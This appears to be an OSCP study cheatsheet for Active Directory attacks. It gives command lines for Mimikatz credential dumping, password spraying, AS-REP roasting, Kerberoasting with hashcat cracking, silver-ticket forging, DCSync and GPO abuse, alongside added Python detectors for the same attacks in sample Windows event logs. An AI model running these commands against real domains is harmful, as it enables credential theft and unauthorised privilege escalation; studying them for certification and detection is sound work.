OSCP Cheatsheet
Active Directory

Attack

Mimikatz.exe

NOTE: Make sure to run PowerShell as Administrator

Launch Mimikatz.exe

C:\Tools\mimikatz.exe

Enable SeDebugPrivilege (needed to read LSASS memory)

privilege::debug

Dump credentials (NTLM hashes) of logged-on users from LSASS

sekurlsa::logonpasswords

Dump local account NTLM hashes from the SAM

lsadump::sam

One-liner

.\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "sekurlsa::logonpasswords" "exit"

Enumeration

View the account policy (minimum password length, lockout threshold, lockout duration)

net accounts

Password Attacks

Spray-Passwords.ps1 (Target Machine)

C:\Tools\Spray-Passwords.ps1 -Pass <Password> -Admin

crackmapexec (Kali)

crackmapexec smb <Target IP Address> -u <Username Lists> -p '<Password>' -d <Domain Name> --continue-on-success

NOTE: If the output of crackmapexec includes "Pwn3d!", it indicates that the user has Administrative privileges on that machine

Kerbrute_windows_amd64.exe (Target Machine)

C:\Tools\kerbrute_windows_amd64.exe passwordspray -d <Domain Name> <Username Lists> "<Password>"
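From the defender's side, the three spray tools above leave the same trace: one source failing against many different accounts in a short window. The following is an added example, not part of the original cheatsheet, that flags that pattern in constructed Windows Security log records (4625 failed logon and 4771 Kerberos pre-authentication failure are the real event IDs; the record layout is a simplified assumption).

```python
# Added example (not from the original cheatsheet): password-spray detection
# over constructed Windows Security events. 4625 / 4771 are real event IDs;
# the dict layout is a simplified assumption, not the Windows XML schema.
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events: one source tries one password against many users.
EVENTS = [
    {"time": "2024-05-01T09:00:00", "id": 4625, "user": "alice", "src": "10.0.0.50"},
    {"time": "2024-05-01T09:00:02", "id": 4625, "user": "bob", "src": "10.0.0.50"},
    {"time": "2024-05-01T09:00:04", "id": 4771, "user": "carol", "src": "10.0.0.50"},
    {"time": "2024-05-01T09:00:06", "id": 4625, "user": "dave", "src": "10.0.0.50"},
    {"time": "2024-05-01T09:00:08", "id": 4625, "user": "erin", "src": "10.0.0.50"},
    # A user mistyping their own password a few times: not a spray.
    {"time": "2024-05-01T09:05:00", "id": 4625, "user": "frank", "src": "10.0.0.77"},
    {"time": "2024-05-01T09:05:30", "id": 4625, "user": "frank", "src": "10.0.0.77"},
    {"time": "2024-05-01T09:06:00", "id": 4625, "user": "frank", "src": "10.0.0.77"},
]

FAILURE_IDS = {4625, 4771}

def detect_spray(events, window=timedelta(minutes=10), min_users=4):
    """Return {source: sorted target users} for sources that fail against at
    least `min_users` distinct accounts inside a sliding time window. Many
    users with few attempts each is the spray signature; it deliberately stays
    under the per-account lockout threshold that `net accounts` shows."""
    by_src = defaultdict(list)
    for e in events:
        if e["id"] in FAILURE_IDS:
            by_src[e["src"]].append((datetime.fromisoformat(e["time"]), e["user"].lower()))
    hits = {}
    for src, attempts in by_src.items():
        attempts.sort()
        start, best = 0, set()
        for end in range(len(attempts)):
            while attempts[end][0] - attempts[start][0] > window:
                start += 1
            users = {u for _, u in attempts[start:end + 1]}
            if len(users) > len(best):
                best = users
        if len(best) >= min_users:
            hits[src] = sorted(best)
    return hits

if __name__ == "__main__":
    for src, users in detect_spray(EVENTS).items():
        print(f"possible password spray from {src}: {', '.join(users)}")
```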

AS-REP Roasting

Impacket-GetNPUsers (Kali)

Get the users that have "Do not require Kerberos preauthentication" enabled, together with their AS-REP hashes

impacket-GetNPUsers -dc-ip <DC IP Address> -request -outputfile hashes.asreproast <Domain Name>/<Username>

Crack the hashed password

sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Rubeus (Target Machine)

Get the users that have "Do not require Kerberos preauthentication" enabled, together with their AS-REP hashes

C:\Tools\Rubeus.exe asreproast /nowrap

Crack the hashed password (after saving the Rubeus output to hashes.asreproast)

sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Kerberoasting

Impacket-GetUserSPNs (Kali)

Request service tickets (TGS) for accounts with an SPN and save their hashes

sudo impacket-GetUserSPNs -dc-ip <DC IP Address> -request -outputfile hashes.kerberoast <Domain Name>/<Username>

Crack the hashed password

sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Rubeus (Target Machine)

Request service tickets (TGS) for accounts with an SPN and save their hashes

C:\Tools\Rubeus.exe kerberoast /outfile:hashes.kerberoast

Crack the hashed password

sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
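Both roasting techniques above are visible to the domain controller: AS-REP roasting shows up as a 4768 TGT request with no pre-authentication, and Kerberoasting as a burst of 4769 service-ticket requests with the RC4 encryption type (0x17). The following is an added example, not part of the original cheatsheet, that triages constructed event records for both patterns (event IDs and encryption types are the real Windows values; the dict layout is a simplified assumption).

```python
# Added example (not from the original cheatsheet): AS-REP roasting (4768) and
# Kerberoasting (4769) triage over constructed Windows Security events.
# 0x17 is RC4-HMAC, the weak etype both attacks request because RC4 tickets
# crack far faster than AES ones (0x11 / 0x12). Dict layout is an assumption.
RC4 = "0x17"

# Constructed sample events.
EVENTS = [
    # AS-REP roast: TGT issued with no pre-authentication, RC4 etype.
    {"id": 4768, "user": "svc_backup", "preauth": "0", "etype": RC4, "client": "10.0.0.50"},
    # Normal TGT: timestamp pre-auth, AES.
    {"id": 4768, "user": "alice", "preauth": "2", "etype": "0x12", "client": "10.0.0.20"},
    # Kerberoast: RC4 service tickets for several SPN accounts from one client.
    {"id": 4769, "user": "alice@CORP.COM", "service": "svc_sql", "etype": RC4, "client": "10.0.0.50"},
    {"id": 4769, "user": "alice@CORP.COM", "service": "svc_web", "etype": RC4, "client": "10.0.0.50"},
    {"id": 4769, "user": "alice@CORP.COM", "service": "svc_iis", "etype": RC4, "client": "10.0.0.50"},
    # Benign: AES ticket for a computer account, and a krbtgt ticket.
    {"id": 4769, "user": "bob@CORP.COM", "service": "WEB04$", "etype": "0x12", "client": "10.0.0.21"},
    {"id": 4769, "user": "bob@CORP.COM", "service": "krbtgt", "etype": RC4, "client": "10.0.0.21"},
]

def asrep_roast_candidates(events):
    """4768 with PreAuthType 0 means the account has 'Do not require Kerberos
    preauthentication' set; with RC4 it is exactly what GetNPUsers / Rubeus
    asreproast produce. Returns the affected account names."""
    return sorted({e["user"] for e in events
                   if e["id"] == 4768 and e["preauth"] == "0" and e["etype"] == RC4})

def kerberoast_candidates(events, min_services=3):
    """4769 RC4 tickets for user (non-$) SPN accounts other than krbtgt. One
    such ticket may be a legacy client; one client collecting tickets for many
    distinct service accounts is the GetUserSPNs / Rubeus kerberoast pattern."""
    per_client = {}
    for e in events:
        if e["id"] != 4769 or e["etype"] != RC4:
            continue
        svc = e["service"]
        if svc.lower() == "krbtgt" or svc.endswith("$"):
            continue
        per_client.setdefault(e["client"], set()).add(svc)
    return {c: sorted(s) for c, s in per_client.items() if len(s) >= min_services}

if __name__ == "__main__":
    print("AS-REP roastable accounts seen:", asrep_roast_candidates(EVENTS))
    print("likely Kerberoasting clients:", kerberoast_candidates(EVENTS))
```

Service accounts that must keep RC4 for compatibility are the ones that need long random passwords or a move to group managed service accounts, since the ticket itself cannot be protected.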

Silver Tickets

NOTE: Information needed to forge a silver ticket

  • SPN password hash

  • Domain SID

  • Target SPN

Get SPN password hash from mimikatz.exe

C:\Tools\mimikatz.exe

privilege::debug

sekurlsa::logonpasswords

Note the NTLM hash of the service account

Get the domain SID from the current user's SID

whoami /user

Drop the last component (the RID after the final "-"); what remains is the domain SID

EXAMPLE:

PS C:\Windows\system32> whoami /user

USER INFORMATION
----------------

User Name SID
========= =============================================
corp\jeff S-1-5-21-1987370270-658905905-1781884369-1105

# Domain SID = S-1-5-21-1987370270-658905905-1781884369

Get Target SPN from PowerView.ps1

Import-Module C:\Tools\PowerView.ps1

Get-NetUser -SPN | select samaccountname, serviceprincipalname

To forge the silver ticket in mimikatz.exe

kerberos::golden /sid:<Domain SID> /domain:<Domain Name> /ptt /target:<SPN Host FQDN> /service:<Service Type> /rc4:<SPN Account NTLM Hash> /user:<Domain User>

EXAMPLE:

kerberos::golden /sid:S-1-5-21-1987370270-658905905-1781884369 /domain:corp.com /ptt /target:web04.corp.com /service:http /rc4:4d28cf5252d39971419580a51484ca09 /user:jeffadmin

DCSync

Mimikatz.exe (Target Machine)

Obtain the target account's NTLM hash by requesting it through directory replication (requires replication rights on the domain)

lsadump::dcsync /user:<Domain Name>\<Username>

Crack the NTLM hash (after saving it to hashes.dcsync)

hashcat -m 1000 hashes.dcsync /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Impacket-secretsdump

impacket-secretsdump -just-dc-user <Target Username> <Domain Name>/<Username>:'<Password>'@<DC IP Address>

NOTE: In the DRSUAPI section of the output each line has the form <user>:<RID>:<LM hash>:<NTLM hash>:::; the NTLM hash is the last field before the trailing ":::"

Crack the NTLM hash (after saving it to hashes.dcsync)

hashcat -m 1000 hashes.dcsync /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
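Both DCSync tools above work by asking the domain controller to replicate directory data, which the DC audits as event 4662 carrying the replication control-access GUIDs. Only domain controllers (and a known sync service, if any) should ever exercise those rights. The following is an added example, not part of the original cheatsheet, that flags any other principal doing so in constructed 4662 records (the GUIDs are the real replication rights; the record layout and allowlist are assumptions).

```python
# Added example (not from the original cheatsheet): DCSync detection over
# constructed Windows Security 4662 records. The GUIDs are the real
# control-access rights replication needs; the dict layout and the allowlist
# are assumptions made for this example.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
# Non-DC accounts permitted to replicate, e.g. a directory sync service (assumed name).
ALLOWED_REPLICATORS = {"MSOL_sync"}

# Constructed sample 4662 events; "properties" mirrors the Properties field,
# which lists the control-access GUIDs exercised on the object.
EVENTS = [
    {"id": 4662, "subject": "DC01$", "properties": ["1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"]},
    {"id": 4662, "subject": "MSOL_sync", "properties": ["1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"]},
    {"id": 4662, "subject": "jeffadmin", "properties": ["1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",
                                                        "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"]},
    # An unrelated right on some object: not replication.
    {"id": 4662, "subject": "jeff", "properties": ["00000000-0000-0000-0000-000000000000"]},
]

def is_domain_controller(account):
    """Computer accounts end in '$'; the example treats those as DCs (a real
    rule would check Domain Controllers group membership instead)."""
    return account.endswith("$")

def dcsync_suspects(events):
    """Return {subject: [right names]} for principals that are neither a DC nor
    allowlisted yet exercised a replication right. lsadump::dcsync and
    secretsdump -just-dc-user both need Get-Changes-All to pull hashes."""
    suspects = {}
    for e in events:
        if e["id"] != 4662:
            continue
        rights = [REPLICATION_RIGHTS[g] for g in e["properties"] if g in REPLICATION_RIGHTS]
        if not rights:
            continue
        who = e["subject"]
        if is_domain_controller(who) or who in ALLOWED_REPLICATORS:
            continue
        suspects[who] = rights
    return suspects

if __name__ == "__main__":
    for who, rights in dcsync_suspects(EVENTS).items():
        print(f"possible DCSync by {who}: {', '.join(rights)}")
```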

Exploits

SharpGPOAbuse.exe

1. Get the list of Group Policy Objects (GPO); Get-GPO comes from the GroupPolicy PowerShell module

Get-GPO -All | Select DisplayName

2. Add the user to the local Administrators group through the GPO

.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount <Username> --GPOName "<GPO Name>"

3. Force a Group Policy update

gpupdate /force